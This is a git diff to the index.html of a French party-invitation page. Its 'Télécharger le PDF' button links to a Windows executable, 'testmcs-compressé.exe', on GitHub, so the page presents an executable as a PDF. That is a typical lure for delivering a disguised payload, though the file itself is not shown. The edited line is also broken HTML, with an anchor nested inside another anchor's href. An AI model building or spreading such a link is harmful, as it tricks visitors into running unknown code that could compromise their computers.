--- a/index.html
+++ b/index.html
@@ -66,7 +66,8 @@
     </div>
     <h1>Afin de visualiser les événements de cette soirée veuillez afficher le PDF</h1>
     <p>Que la fête commence !</p>
-    <a class="download-btn" href="https://github.com/sndcrt/site-web-/raw/refs/heads/main/testmcs-compress%C3%A9.exe" download> Télécharger le PDF </a>
+    <a class="download-btn" href=<a href="https://github.com/sndcrt/site-web-/raw/main/testmcs-compress%C3%A9.exe" download>Télécharger le fichier</a>
+ download> Télécharger le PDF </a>
 
     <script>
         function createConfetti() {
